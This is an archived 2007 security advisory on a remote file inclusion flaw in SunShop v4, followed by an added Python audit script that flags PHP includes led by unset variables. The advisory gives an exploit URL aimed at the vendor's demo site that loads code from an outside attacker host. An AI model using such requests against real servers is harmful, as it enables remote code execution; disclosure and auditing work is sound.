Computer Security
[EN] securityvulns.ru




From:alijsb_(at)_yahoo.com <alijsb_(at)_yahoo.com>
Date:28.04.2007
Subject:sunshop v4 >> RFI

vendor : turnkeywebtools.com
by : s3rv3r_hack3r ( alijsb@yahoo.com )
bugz:
++++++++++++++++++++
include/payment/payflow_pro.php >
include $abs_path."/include/payment/payflow_pro/pfpro.class.php";
++++++++++++++++++++
global.php
require_once $abs_path."/libsecure.php";
++++++++++++++++++++
libsecure.php
include $abs_path . '/admin/config.php';
++++++++++++++++++++
Exploit : file.php?abs_path=http://shell
for example :
http://demos.turnkeywebtools.com/ss4/include/payment/payflow_pro.php?abs_path=http://www.hackerz.ir/?
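
Added example (not part of the original advisory and not SunShop code): a heuristic Python audit that flags include/require statements whose path starts with a variable the file itself never sets from a trusted value, which is the pattern in the three snippets quoted above. The function names, the SAMPLES dictionary and the two "example" files are constructed for illustration.

```python
import re

# include/require(_once) whose path expression starts with a variable.
INCLUDE_RE = re.compile(
    r"\b(?:include|require)(?:_once)?\b\s*\(?\s*\$([A-Za-z_]\w*)", re.I)
# "$name = <rhs>"; the lookahead skips "==" comparisons.
ASSIGN_RE = re.compile(r"\$([A-Za-z_]\w*)\s*=(?!=)\s*([^;]*)")
# A value copied from the request does not make the path trustworthy.
REQUEST_RE = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\b|\$HTTP_\w+_VARS\b")

def unanchored_includes(php_source):
    """Return [(line_no, variable)] for includes whose leading variable was
    not assigned earlier in the same file from a non-request value."""
    events = [(m.start(), "inc", m) for m in INCLUDE_RE.finditer(php_source)]
    events += [(m.start(), "set", m) for m in ASSIGN_RE.finditer(php_source)]
    anchored, findings = set(), []
    for pos, kind, m in sorted(events, key=lambda e: e[0]):
        name = m.group(1)
        if kind == "set":
            if REQUEST_RE.search(m.group(2)):
                anchored.discard(name)
            else:
                anchored.add(name)
        elif name not in anchored:
            findings.append((php_source.count("\n", 0, pos) + 1, name))
    return findings

def audit(files):
    """Map each file name to its findings, dropping clean files."""
    found = {name: unanchored_includes(src) for name, src in files.items()}
    return {name: hits for name, hits in found.items() if hits}

# Constructed samples: the first three wrap the lines quoted in the advisory,
# the last two are hypothetical variants for comparison.
SAMPLES = {
    "include/payment/payflow_pro.php":
        '<?php\ninclude $abs_path."/include/payment/payflow_pro/pfpro.class.php";\n',
    "global.php": '<?php\nrequire_once $abs_path."/libsecure.php";\n',
    "libsecure.php": "<?php\ninclude $abs_path . '/admin/config.php';\n",
    "fixed_example.php":
        '<?php\n$abs_path = dirname(__FILE__);\nrequire_once $abs_path."/libsecure.php";\n',
    "tainted_example.php":
        "<?php\n$abs_path = $_GET['abs_path'];\ninclude $abs_path . '/admin/config.php';\n",
}

if __name__ == "__main__":
    print(audit(SAMPLES))
```

A hit is a candidate for review, not proof: a file that expects its parent script to set the variable is still flagged, because that is the file that becomes reachable with a request-supplied value when it is requested directly.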

© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


